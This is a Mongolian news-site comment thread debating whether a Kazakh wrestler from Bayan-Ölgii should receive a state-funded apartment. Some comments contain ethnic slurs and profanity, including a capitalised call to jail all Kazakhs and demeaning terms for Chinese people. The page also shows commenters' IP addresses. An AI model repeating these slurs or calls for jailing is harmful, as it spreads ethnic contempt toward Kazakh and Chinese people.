Мустафа начин бол ноен нуруутай сайн бөх , бөхийн ес жудгыг маш сайн баримталдаг хүн, байр өгөх нь зөв

zochin [203.91.115.253] 2020-10-28 08:35:22

Ноён нуруугаар нь өгдиймүү, амжилтаар нь өгдиймүү. Жудаг нь ийм байдаг гэсэн нарийн зааг байх уу

Зочин [192.82.64.248] 2020-10-28 02:21:03

төсвийн мөнгөөр бол болохгүй ээ, та өөрөө энэ сайн хүнээ хүндлээд хэдэн ч байр хувиасаа авч өгч болноо

Зочин [103.57.94.132] 2020-10-27 21:03:45

Boh blhoor bair ogdimu teneg ee

Зочин [64.119.26.7] 2020-10-27 15:12:46

hutsaad bgaan be chi

Зочин [192.82.65.224] 2020-10-27 08:12:01

юу вэ. төрийн мөнгөөр нэг бөхөд байр өгнө гэж юу байдгийн. дэмждэг дэвжээ ивээн тэтгэдэг компаниуд нь мөнгө гаргаачээ. улсын мөнгийг идэхдээ ичдэггүй шаарднууд вэ

paaaaaaa piiiiiiiiiiiiiii [59.153.113.61] 2020-10-27 08:09:37

Aimagaaraa halamj avdag olon davhar magadgui irgen bur 3-5 halamj hurtdeg, hamgiin bayan irgedtei aimag gants tsol avsan buhduu bayachuudaasaa 10,10 tsaas tsugluulaad bair avaad uguh chadvargui baina gej yu baihav, zugeer oliv doliv2 iluu nudeer harah honotsiin yaduu setgel, handlaga... gej baihav iimerhuu bvh asuudlaa shiidchihdeg uls dayaraan aldartai ulger jishee aimag bas baidgiim bain lee shuu, ter aimgiihan augaa humuus/

Зочин [43.242.243.121] 2020-10-27 07:41:21

Элдэв дээдээр хасгууд гээд байгаа нөхдүүд яс юманд бол хужаа нартай улаан гараараа тэмцэх хүмүүс чинь наад чиний үзэн ядаад байгаа хасгууд чинь Тэрийг мэдээд наад баруун хязгаарт чинь Маршал суух эрхийг нь өгсөн Наад захын ухаарч сэхэх ухаангүй юмнууд хужаагийн 5 цаасыг хараад юугаа ч худалдаж мэдэх өнгө мөнгө гэхэд газар нутгаач тэр чигээр нь өгч мэдэх хөгийн гарууд эсвэл тэдний хөл гар болсон юмнууд л хагаралдуулах санаатай комeнт бичээд суудаг та нарын санааг мэдэхгүй гэж бодоо юу

Зочин [66.181.185.135] 2020-10-28 02:07:12

гуцдаг үкэр вэ тухайн үедээ гамингуудтай нийлээд хүзүү сээрээрээ холбогдоод явж бсан биз дээ

Jumdan [87.79.254.59] 2020-10-27 07:28:58

Rzhc xfhjjn nutdcvgh nji8trdxg fdvvbuujvcc jmcddjk vyweghcxgjjjj

Зочин [183.177.100.234] 2020-10-27 07:27:44

хилийн цэрэг, цагдаа, онцгой байдал гээд бүх л байгууллагын дарга нар бөхөө хүлээн авч уулзахдаа мөрөн дээр нь хурандаа цол зүүж гарт нь 3 өрөө байрны түлхүүр гардуулдаг ш дээ. аварга Оюунболд гэхэд 2012 онд цагдаагийн хүч спорт хороонд анх орж цагдаад данстай болж 2019 онд түрүүлээд ХУРАНДАА цол авч байраар шагнуулсан. 26 настай, цагдаад 7 жил ажилаад ХУРАНДАА болоход юу ч хэлээгүй, цолон ч төрийнх байр нь ч төрийнх. Батсуурь аварга бас 2018 онд түрүүлээд Онцгой байдлын ДЭД ХУРАНДАА болсон, онцгойд 4 ажил ажиллаад хурандаа дээр 4 өрөө байртай болсон

Zocnin [68.145.61.75] 2020-10-27 07:16:51

Kazak tumen maanisaihan humuus Bidnii 25 huwid jazak tsus bgaa Iimsd ew negdlee deedelj yawbal mkngol hogjinoo

Зочин [202.131.253.122] 2020-10-27 07:03:13

ӨМХИЙ ХАСАГУУДЫГ БҮГДИЙГ НЬ ШОРОНД ХИЙ,ТӨСӨВИЙН МӨНГӨ МОНГОЛ УЛСЫН ТАТВАРЫН МӨНГӨ,ГАНЦ БӨХДӨӨ НУТГИЙН ЗӨВЛӨЛ НЬ АЙМГААСАА МӨНГӨ ЦУГЛУУЛУУД БАЙР АВЧ ӨГЧ ЧАДАХГҮЙ ӨЛӨН ПИЗДАНУУД ВЭ

kenei [66.181.179.11] 2020-10-27 06:17:45

Buu gaih! Jil bur boldog naadamaar buhchuudee 2 uruu buu hel hed hedem uruuguur shagnaad baidag shuudee! Bid gants buhuu 2 uruu bairtai bolgoh gej zui yosnii asuudal tavij bn . ene n ulsiin tusuvd ymARCH HAMAAGUI YM . ZUVHUN ULGIICHUUDED HAMAARNA. BUU BARITS!!!

Зочин [202.126.89.75] 2020-10-27 05:56:56

ганц бөхөө шагнах гээд,монголчуудаас хараал үг сонсох юмаа,угаасаа дарга нар тэрбумаар нь идэж бхд

Зочин [119.40.103.3] 2020-10-27 05:50:55

энэ улсад юу ч болоод байдын мэдэх юм алгадоо бид нарын татвараар хасгууд гараа угаагаад байдаг бид УБ-д хэдэн хүүхдээ шатаагаад зодоод алаад байж байдаг мэдэхгүйээ

Зочин [202.126.89.60] 2020-10-27 05:47:44

зөв ч дэ,бөхчүүдийг дэмжээрэй,монгол ахан дүүсээ,сайхан мэдээ бн,их баярлалаа!

Зочин [202.55.188.82] 2020-10-27 05:40:50

Энэ баян өлгий аймгийн нөхдүүд арай дэндэж байна шүү аймгаарай халамж авна одоо бүр тендер зарлаж байгаа д байр авна

Зочин [66.181.161.48] 2020-10-27 05:31:22

Ил тод энэ нь маш зөв

Зочин [49.179.133.68] 2020-10-27 05:17:08

Sda bid nar buhud bair ug gej tatwar tuluuguishuu

Зочин [202.179.26.181] 2020-10-27 05:12:45

солиорчих юм бна л даа

Зочин [202.126.89.121] 2020-10-27 05:10:56

иргэдийн хурал шийдсэн бол ингэж болно

Зочин [43.228.129.131] 2020-10-27 05:07:21

Төсөвийн мөнгөөр ингэж болдог юм уу?

Зочин [202.21.109.60] 2020-10-27 04:54:05

ulsiin mongoor hasguud dendnee arai

irgen [66.181.167.74] 2020-10-27 04:34:29

Ene bayanolgiinhon chine bur duraaraa durgidag um bish uu.

Зочин [202.126.90.41] 2020-10-27 04:47:03

Баян Өлгий гэж байхад. Уншиж чадахгүй байж хүн муулаастай


1525 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1525 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.